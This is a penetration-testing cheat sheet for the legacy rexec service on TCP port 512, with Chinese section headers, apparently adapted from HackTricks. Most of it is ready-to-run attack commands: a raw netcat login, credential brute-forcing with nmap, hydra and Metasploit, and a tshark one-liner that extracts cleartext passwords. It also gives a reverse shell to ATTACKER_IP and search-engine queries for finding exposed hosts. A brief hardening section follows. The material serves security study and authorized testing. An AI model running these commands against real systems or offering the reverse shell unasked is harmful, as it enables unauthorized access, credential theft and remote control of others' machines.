512 - Rexec

💡 学习提示: 本文档介绍 512 - rexec 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

协议 quick-look

客户端 connects to TCP 512.
客户端 sends three NUL-terminated strings:
- the port number (as ASCII) where it wishes to receive stdout/stderr (often 0),
- the username,
- the password.
A final NUL-terminated string with the command to execute is sent.
The server replies with a single 8-bit status byte (0 = success, 1 = failure) followed by the command output.

That means you can reproduce the exchange with nothing more than echo -e and nc:

(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512

If the credentials are valid you will receive the output of id straight back on the same connection.

Manual usage with the client

Many Linux distributions still ship the legacy client inside the inetutils-rexec / rsh-client package:

rexec -l user -p password <target> "uname -a"

If -p is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).

信息收集 & Brute-forcing

Brute-force

Nmap

nmap -p 512 --script rexec-info <target>
## Discover service banner and test for stdout port mis-configuration

nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>

The rexec-brute NSE uses the protocol described above to try credentials very quickly .

Hydra / Medusa / Ncrack

hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8

hydra has a dedicated rexec module and remains the fastest offline bruteforcer . medusa (-M REXEC) and ncrack (rexec module) can be used in the same way.

Metasploit

use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

The module will spawn a shell on success and store the credentials in the database .

Sniffing credentials

Because everything is clear-text, network captures are priceless. With a copy of the traffic you can extract creds without touching the target:

tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
  awk -F"\\0" '{print $2":"$3" -> "$4}'  # username:password -> command

(In Wireshark enable Decode As … TCP 512 → REXEC to view nicely-parsed fields.)

Post-漏洞利用 tips

Commands run with the privileges of the supplied user. If /etc/pam.d/rexec is mis-configured (e.g. pam_rootok), root shells are sometimes possible.
Rexec ignores the user’s shell and executes the command via /bin/sh -c <cmd>. You can therefore use typical shell-escape tricks (;, $( ), backticks) to chain multiple commands or spawn reverse shells:
```
rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
```
Passwords are often stored in ~/.netrc on other systems; if you compromise one host you may reuse them for lateral movement.

Hardening / Detection

Do not expose rexec; replace it with SSH. Virtually all modern inetd superservers comment the service out by default.
If you must keep it, restrict access with TCP wrappers (/etc/hosts.allow) or firewall rules and enforce strong per-account passwords.
Monitor for traffic to :512 and for rexecd process launches. A single packet capture is enough to detect a compromise.
Disable rexec, rlogin, rsh together – they share most of the same codebase and weaknesses.

搜索引擎语法

FOFA

# FOFA 搜索语法
port="512"

Shodan

# Shodan 搜索语法
port:512

ZoomEye

# ZoomEye 搜索语法
port:512

📖 参考资料

HackTricks - 512-rexec